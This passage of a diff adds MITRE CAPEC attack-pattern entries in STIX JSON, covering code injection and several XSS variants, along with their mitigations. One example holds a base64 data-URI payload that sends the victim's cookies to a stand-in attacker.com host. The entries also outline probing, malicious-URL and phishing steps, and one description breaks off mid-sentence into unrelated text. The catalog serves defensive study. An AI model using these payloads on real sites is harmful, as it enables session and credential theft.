"relationship--56610af9-7476-40eb-9fe6-53cf9958d96d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49b55648-8b51-4e4f-981c-60f90a683b32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce regular patching of software.", + "id": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6454cc9d-9fac-4495-9887-bfcf65fb0131", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-241", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/241.html" + } + ], + "id": "attack-pattern--b8923381-6219-46bf-b05d-3fa706c0d467", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "external_id": "CAPEC-242", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/242.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "description": "Code Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Code_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-612", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html" + } + ], + "id": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--634aeef0-13a8-449b-afea-332cbc6095bf", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_prerequisites": [ + "The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-242-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f5e3b137-a200-4caa-9f02-88cba0ca4e80", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcbfee88-5388-4fea-b023-06917c8b7cfd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e446d58c-04b2-49cb-a3bd-32a5c4a303b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b074b90c-807f-4764-ae36-cfc636a4d377", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.", + "external_references": [ + { + "external_id": "CAPEC-243", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/243.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Jeremiah Grossman, Attribute-Based Cross-Site Scripting", + "external_id": "REF-94", + "source_name": "reference_from_CAPEC", + "url": "http://jeremiahgrossman.blogspot.com/2007/07/attribute-based-cross-site-scripting.html" + } + ], + "id": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Targeting HTML Attributes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS targeting HTML attributes: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various malicious expressions as input, hoping to embed them as HTML attributes.

    2. Techniques
    Inject single and double quotes into URL parameters or other inputs to see if they are filtered out. Also use URL encoding to bypass filters.
    Use single or double quotes to close attribute evaluation and enter a new attribute that contains an expression.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Execute a script using an expression embedded in an HTML attribute, which avoids needing to inject a script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_prerequisites": [ + "The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands." + ], + "x_capec_resources_required": [ + "The adversary must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.", + "id": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-243-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f1ebe4-ac7e-4221-af0e-4f36e5905da9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3647060a-91b9-4ee7-bbf8-78c5d4f20adf", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--efed9086-1bee-4608-a734-9e9b775b744f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", + "external_references": [ + { + "external_id": "CAPEC-244", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/244.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Google Cross-Site Scripting HOWTO article, Google", + "external_id": "REF-96", + "source_name": "reference_from_CAPEC", + "url": "https://code.google.com/archive/p/doctype/wikis/ArticleXSSInUrlAttributes.wiki" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting URI Placeholders", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An adversary could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for reflected XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various payloads formatted as data URI schemes using base to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious payload formatted as a URI scheme, or use the URL returned when the URI scheme was given as input to the web application.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application" + ], + "x_capec_skills_required": { + "Medium": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e01b3e67-6f6d-47fe-a52a-568341eaba2c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-244-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b1be8912-a434-4763-a021-096909c3c231", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb7c30e0-981f-4cc9-a85a-920f323e51d3", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2dd74b7-ad13-4193-b646-3ae46944b3c3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4100acc-da5c-4fd0-a273-8a3d0fe4ea3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--63ed5cb5-5feb-4677-8623-3c5552f796ee", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1d630925-153a-43e4-a045-6c039ccdbdbe", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26850710-b983-423b-962a-5fd4b550fa0e", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9508c797-2ba7-4939-a345-8ab83ec69feb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b5c6c90-751d-4b9c-b88f-480109d98c30", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76657fee-14db-472c-9608-b7bce62e9fb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<", + "\n Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an adversary would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.\n Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the adversary, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe public links for XSS vulnerability: The adversary uses the public links gathered in the \"Explore\" phase as a target list and requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.

    2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation." + ], + "x_capec_resources_required": [ + "Ability to send HTTP post to scripting host and collect output" + ], + "x_capec_skills_required": { + "High": "Exploiting any information gathered by HTTP Query on script host", + "Low": "To place malicious payload on server via HTTP" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cc8dc0d-4869-4cb5-8228-263779929d0c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.", + "id": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-32-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 